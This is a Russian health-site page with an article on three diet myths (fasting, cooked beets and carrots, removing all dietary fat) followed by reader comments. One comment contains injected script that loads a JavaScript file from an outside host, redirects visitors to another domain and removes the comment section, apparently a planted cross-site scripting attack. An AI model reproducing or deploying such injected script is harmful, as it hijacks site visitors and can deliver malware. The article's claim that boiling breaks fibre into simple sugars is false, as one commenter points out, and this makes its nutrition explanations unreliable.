Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мифы о диете  >>  Мифы о диете
 
Обратная связь
 

Мифы о диете

Размер шрифта
05 июня 2012 07:00
  • google_analytics: false
  • Нравится

Диета не так страшна, как ее обычно рисует людская молва. Для того чтобы вы тратили калории, а не нервы, мы выяснили, насколько правдивы некоторые утверждения о диетах.

1

Утверждение первое. Голодание эффективный и здоровый способ похудеть

Это миф. На самом деле, когда мы перестаем питаться, включается механизм активирования особых ферментов. Эти ферменты отправляют жир в печень, которая начинает запасать его в своих клетках. В свою очередь, клетки печени, наполняясь жиром, разрываются и погибают, а на их месте образуются рубцы. Этот процесс называется жировым перерождением печени, на фоне которого развивается цирроз печени.

1
На фото: макет клетки печени, наполненной жиром


1

На фото: клетка печени разорвалась

Что делать

Не голодать. Наше правило – чтобы похудеть нужно есть, но малыми порциями и 5 раз в день.

Утверждение второе. Морковь и свекла в любом виде способствуют похудению

Нет, это миф! На самом деле при термической обработке у свеклы повышается гликемический индекс, т.е. способность высвобождать сахар в кровь. При высоком гликемическом индексе человек не может насытиться надолго, поэтому он вынужден больше есть, что в результате приводит к излишнему весу.

Это объясняется так. Во время поглощения пищи мозг реагирует на наличие сахара в крови и «насыщается», что приводит к выбросу инсулина, сахар в крови понижается, но чувство голода через какое-то время возвращается снова.

Если морковь или свеклу сварить, то их гликемический индекс резко повышается. Это происходит, потому что клетчатка, которая содержится в свежих овощах, при варке распадается на простые сахара, поэтому они быстрее проникают в кровь, усваиваются организмом и человек поправляется.

Что делать

Лучше употреблять свеклу и морковь в сыром виде.

Утверждение третье. Надо исключить весь жир во время диеты

Это заблуждение, потому что без жира организм не может существовать. Из жировых компонентов состоят мембраны всех клеток нашего тела, жир входит в состав миелиновых оболочек нервов, жиры ответственны за гормоны и за стабильность состава желчи, таким образом, без жира жизнедеятельность организма невозможна.

Например, если из еды исключить жиры, а особенно ненасыщенные жиры, желчь перестает быть стабильной, и начинается ее кристаллообразование, что со временем приведет к образованию камней в желчном пузыре.

1
На фото: камни в желчном пузыре

В норме желчный пузырь сокращается только в ответ на поступление жира в организм.

Поэтому исключать жир из пищи на 100% нельзя, просто нужно правильно его употреблять: хотя бы один раз в день в рационе должна быть чайная ложка растительного масла. Благодаря чему текучесть желчи сохранится, и литогенность (способность образовывать камни) снизится. Ведь, как известно, частым осложнением диет является желчекаменная болезнь.

Что делать

Нельзя полностью исключать жир из рациона. Питание, даже во время диеты, должно быть сбалансировано.

Если вы худеете, то худейте правильно. Наши простые и разумные советы в этом вам помогут.

 

Сюжеты по теме:
Мифы о диете. Каким утверждениям не стоит верить 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

06 марта 2012 в 16:16

Цитировать   |   Пожаловаться

Вот вы пишете: "Если морковь или свеклу сварить, то их гликемический индекс резкоповышается. Это происходит, потому что клетчатка, которая содержится всвежих овощах, при варке распадается на простые сахара,..". Это же полная чушь! клетчатка никогда на разложится до сахаров при варке просто в воде! для ее разложения на простые углеводы нужно кипятить ее в растворе сильной серной кислоты и довольно долго!
Вот что при варке действительно происходит, так это набухание крахмала (который в различных количествах содержится во всех овощах и фруктах) и превращение его в растворимую усвояемую форму!
Еще при варке набухают пектиновые вещества, но они не усваиваются.


Гость 06 марта 2012 в 16:16
Вот что при варке действительно происходит
Главным в этой статье является повышение гликемического индекса у продукта во время тепловой обработки,  а следовательно, продукт не может быть взят на вооружение при составлении гипокалорийного меню. 

3 - Гость

12 марта 2012 в 14:48

Цитировать   |   Пожаловаться

Ну раз уж беретесь объяснять, почему это происходит, так объясняйте грамотно, или вовсе не объясняйте!

4 - Гость

05 марта 2015 в 21:41

Цитировать   |   Пожаловаться

 Не нужно голодать. Просто кушайте всего по немного. Занимайтесь спортом.                                                                                Спортивный интернет-магазин

5 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.